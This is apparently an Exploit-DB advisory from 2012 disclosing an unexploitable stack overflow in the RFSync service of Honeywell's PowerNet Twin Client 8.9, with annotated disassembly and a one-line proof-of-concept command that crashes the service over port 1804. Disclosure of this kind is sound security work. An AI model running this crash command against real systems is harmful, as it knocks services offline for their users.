PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)

EDB-ID:

19456

CVE:





Platform:

Windows

Date:

2012-06-29


#######################################################################

                             Luigi Auriemma

Application:  PowerNet Twin Client
              http://www.honeywellaidc.com/en-US/Pages/Product.aspx?category=Software&cat=HSM&pid=PowerNet%20Twin%20Client
Versions:     <= 8.9 (RFSync 1.0.0.1)
Platforms:    Windows
Bug:          unexploitable stack overflow
Exploitation: remote
Date:         29 Jun 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"PowerNet Twin Client v8.9 PowerNet Twin Client is a serverless,
terminal based software used in 2.4 GHz networks."


#######################################################################

======
2) Bug
======


The software uses the function 00403cb0 to read 100 bytes from the
incoming connection and uses a signed 8bit value provided by the
client to copy this data in a stack buffer:

  00403DCB  |. 0FBE4424 29         MOVSX EAX,BYTE PTR SS:[ESP+29]   ; 8bit size with 8->32bit
  00403DD0  |. 8B8C24 38020000     MOV ECX,DWORD PTR SS:[ESP+238]   ; integer expansion bug
  00403DD7  |. 83C4 08             ADD ESP,8
  00403DDA  |. 48                  DEC EAX                          ; integer overflow
  00403DDB  |. 85C9                TEST ECX,ECX
  00403DDD  |. 74 02               JE SHORT RFSync.00403DE1
  00403DDF  |. 8901                MOV DWORD PTR DS:[ECX],EAX
  00403DE1  |> 8B9424 2C020000     MOV EDX,DWORD PTR SS:[ESP+22C]
  00403DE8  |. 85D2                TEST EDX,EDX
  00403DEA  |. 74 29               JE SHORT RFSync.00403E15
  00403DEC  |. 8BC8                MOV ECX,EAX
  00403DEE  |. 8BD9                MOV EBX,ECX
  00403DF0  |. C1E9 02             SHR ECX,2
  00403DF3  |. 8BFA                MOV EDI,EDX
  00403DF5  |. 8D7424 23           LEA ESI,DWORD PTR SS:[ESP+23]    ; stack overflow
  00403DF9  |. F3:A5               REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>

So the byte 0x80 will become 0xffffff80 and so on.

Unfortunately this vulnerabily cannot be exploited to execute code
because there is no way to control the data located after the packet
that has a fixed size of 100 bytes: the result is just a Denial of
Service.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19456.zip


  udpsz -T -b 0x41 -C "11 00" SERVER 1804 100


#######################################################################

======
4) Fix
======


No fix.


#######################################################################